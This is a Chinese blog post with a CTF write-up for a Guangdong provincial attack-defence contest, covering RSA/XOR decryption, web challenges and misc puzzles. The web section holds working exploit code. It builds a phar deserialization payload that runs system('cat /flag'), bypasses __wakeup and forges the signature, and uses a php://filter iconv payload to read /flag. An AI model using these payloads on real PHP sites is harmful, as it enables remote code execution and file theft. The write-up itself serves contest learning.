cyi wp第三届广东省攻防竞赛

Crypto

简单的rsa搭配异或加解密,

# encoding:utf-8
from Crypto.Util.number import *
from Crypto.Util.strxor import strxor

d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
ciphertext = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451


def decrypt(c, N, d):
m = pow(c, d, N)

decrypted_msg = long_to_bytes(m)

key = b'Life is like an ocean only strong-minded can reach the other shore'
decrypted_msg = strxor(decrypted_msg, key[:decrypted_msg.__len__()])
return decrypted_msg.decode()


decrypted_message = decrypt(ciphertext, N, d)
print(decrypted_message)

flag{1s_Pa33w0rd_1y2u22}

 

 

 

web

unserialize_web

扫目录下载www.tar.gz

跟着这篇文章打就行了

php(phar)反序列化漏洞及各种绕过姿势 (pankas.top)


生成phar文件
<?php
class File{
public $val1;
public $val2;
public $val3;
public function __construct($ccy, $bkq, $cmd){
$this->val1 = $ccy;
$this->val2 = $bkq;
$this->val3 = $cmd;
}
}

@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>"); //设置stub
$o = new File("file", "exists", "system('cat /flag');");
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

绕wakeup和修改签名,wakeup改个数即可绕过

from hashlib import sha1
import gzip

f = open("phar.phar", 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
s = s.replace(b'3:{', b'4:{')
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s + sha1(s).digest() + h # 数据 + 签名 + 类型 + GBMB
# gzip.compress(
open("phar.gif", 'wb').write(gzip.compress(newf)) # 写入新文件

 

 

消失的flag

Xff头绕过access,给file传参

PHP代码审计 - ^cyi^ - 博客园 (cnblogs.com)

然后就是对着我自己的文章一顿操作,string filiter、read、quoted被ban了,只能用convert.iconv了

Fuzz得到payload

?file=php://filter/convert.iconv.UCS-4*.UCS-4*/resource=/flag

Mypdf(fail)

www.zip下载源码,然后就没有然后了,审不动

hackme(fail)

弱口令,admin 123456

 

 

 

MISC

猜一猜

下载得到压缩包,压缩包名就是密码,

扫一扫,❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

前几个比赛打过,花朵解密

文本加密为花朵符号,可自设密码|文本在线加密解密工具 (qqxiuzi.cn)

你要的就在这(fail)

在图片尾提示stegpy

上面积分的结果是π,6应该是提示秘钥位数

得到秘钥luckyone

0 1,通道有东西,单0,单1,01结合都没提出有用的东西

posted @ 2024-05-13 23:54  ^cyi^  阅读(8)  评论(0编辑  收藏  举报